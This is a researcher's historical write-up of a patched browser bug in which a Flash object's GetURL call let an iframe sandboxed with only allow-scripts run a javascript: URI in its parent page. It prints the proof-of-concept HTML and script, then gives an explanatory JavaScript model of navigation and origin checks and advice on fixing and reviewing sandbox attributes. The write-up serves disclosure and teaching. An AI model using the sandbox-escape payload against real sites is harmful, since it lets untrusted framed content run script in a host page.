Once the sandboxed document had finished loading, an iframe carrying only sandbox="allow-scripts" could inject a Flash object whose ActionScript called GetURL to run JavaScript in the parent window. The browser attributed the resulting navigation to the parent's own context rather than to the sandboxed frame that hosted the plugin, so none of the sandbox restrictions applied and the sandbox was bypassed completely.
<!-- parent page: the frame gets allow-scripts only, so it has an opaque origin
     and is not supposed to navigate or script its parent -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>

<!-- sandboxed.html -->
<script>
window.onload = function () {
    // Insert the Flash object only after the page has loaded; inserting it
    // during the initial parse got the plugin blocked.
    var strSwf = '<object codebase="http://fpdownload.macromedia.com/...">' +
        // geturl.swf calls GetURL(REDIR, TARGET): it navigates _parent to a javascript: URI
        '<param name="movie" value="geturl.swf?TARGET=_parent&REDIR=javascript:alert(document.body.innerText);" />' +
        '</object>';
    document.body.insertAdjacentHTML('beforeEnd', strSwf);
};
</script>
The Flash movie called GetURL with _parent as the target window and a javascript: URI as the URL. The browser executed the script in the parent frame's context without applying any of the sandbox restrictions: the frame had neither allow-same-origin nor allow-top-navigation, yet it both navigated its parent and ran script there. The insertion had to happen after the page loaded; when the object was inserted during the initial parse, the Flash content was blocked.
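To make the attribution point concrete, here is an added example (mine, not code from the original post or from any browser) that models the two checks a sandbox is supposed to apply to a navigation: the sandboxed-navigation flag (a sandboxed frame may navigate only itself, its descendants, and, with allow-top-navigation, the top-level frame) and the rule that a javascript: URL may only navigate a target whose origin matches the initiator's. The frame tree, origin model and URL parsing are simplified assumptions for illustration. Running the same GetURL request with the initiator recorded as the parent (what the buggy browser did) versus the sandboxed frame (what it should have done) shows why the bypass worked; a fourth case shows that allow-same-origin plus allow-top-navigation would legitimately let the javascript: navigation through, which is the same outcome reached by design rather than by bug.

```javascript
'use strict';

// Build a frame with an origin, an optional parent and an optional set of
// sandbox tokens (null = not sandboxed). Without allow-same-origin the
// sandboxed document gets an opaque origin that matches nothing.
function makeFrame(name, origin, parent = null, sandbox = null) {
  const frame = { name, origin, parent, sandbox, children: [] };
  if (sandbox !== null && !sandbox.has('allow-same-origin')) {
    frame.origin = { opaque: true };
  }
  if (parent) parent.children.push(frame);
  return frame;
}

function isAncestor(maybeAncestor, frame) {
  for (let f = frame.parent; f; f = f.parent) if (f === maybeAncestor) return true;
  return false;
}

function top(frame) {
  let f = frame;
  while (f.parent) f = f.parent;
  return f;
}

// Origins are modeled as plain strings, or {opaque: true} for a sandboxed document.
function sameOrigin(a, b) {
  if (a.opaque || b.opaque) return false;
  return a === b;
}

// Browsers strip ASCII tab/newline from a URL and lowercase the scheme, so
// "Java\tScript:" still resolves to javascript:. Mirror that before checking.
function scheme(url) {
  const cleaned = url.replace(/[\t\n\r]/g, '').trimStart();
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Decide whether `source` may navigate `target` to `url`.
function checkNavigation(source, target, url) {
  const sb = source.sandbox;
  if (sb !== null && target !== source && !isAncestor(source, target)) {
    // Sandboxed navigation flag: self and descendants only, unless the
    // target is top and allow-top-navigation was granted.
    const isTop = target === top(source);
    if (!(isTop && sb.has('allow-top-navigation'))) {
      return { allowed: false, reason: 'sandboxed frame may not navigate ' + target.name };
    }
  }
  if (scheme(url) === 'javascript' && !sameOrigin(source.origin, target.origin)) {
    // A javascript: URL runs in the target document, so the initiator must
    // be same-origin with it.
    return { allowed: false, reason: 'cross-origin javascript: navigation of ' + target.name };
  }
  return { allowed: true, reason: 'ok' };
}

// Constructed frame tree matching the post: a parent page containing
// <iframe sandbox="allow-scripts">.
function buildScenario(sandboxTokens = ['allow-scripts']) {
  const parent = makeFrame('parent', 'https://example.test');
  const sandboxed = makeFrame('sandboxed', 'https://example.test', parent, new Set(sandboxTokens));
  return { parent, sandboxed };
}

const PAYLOAD = 'javascript:alert(document.body.innerText)';

// Buggy attribution: GetURL(_parent) from the plugin was credited to the
// parent itself, so the navigation looked like parent -> parent and passed.
function buggyAttribution() {
  const { parent } = buildScenario();
  return checkNavigation(parent, parent, PAYLOAD);
}

// Correct attribution: the initiator is the sandboxed frame hosting the
// plugin, so the navigation flag rejects it before the origin check even runs.
function correctAttribution() {
  const { parent, sandboxed } = buildScenario();
  return checkNavigation(sandboxed, parent, PAYLOAD);
}

// allow-top-navigation lets the frame send top to an http(s) URL, but the
// opaque origin still blocks a javascript: URL into the parent.
function withTopNavigation() {
  const { parent, sandboxed } = buildScenario(['allow-scripts', 'allow-top-navigation']);
  return {
    http: checkNavigation(sandboxed, parent, 'https://example.test/next'),
    js: checkNavigation(sandboxed, parent, PAYLOAD),
  };
}

// allow-scripts + allow-same-origin + allow-top-navigation: the frame is
// same-origin with its parent and may navigate top, so the javascript: URL is
// permitted by the rules themselves. That token combination is effectively no sandbox.
function fullyRelaxed() {
  const { parent, sandboxed } = buildScenario(['allow-scripts', 'allow-same-origin', 'allow-top-navigation']);
  return checkNavigation(sandboxed, parent, PAYLOAD);
}

module.exports = { scheme, checkNavigation, buggyAttribution, correctAttribution, withTopNavigation, fullyRelaxed };
```

The fix a browser needs here is not a new check but correct bookkeeping: any navigation a plugin initiates must be charged to the browsing context that hosts the plugin, so that the existing sandbox and origin checks see the right initiator. When reviewing sandbox attributes today, treat allow-scripts together with allow-same-origin and allow-top-navigation as equivalent to no sandbox at all, as the last case shows.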
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.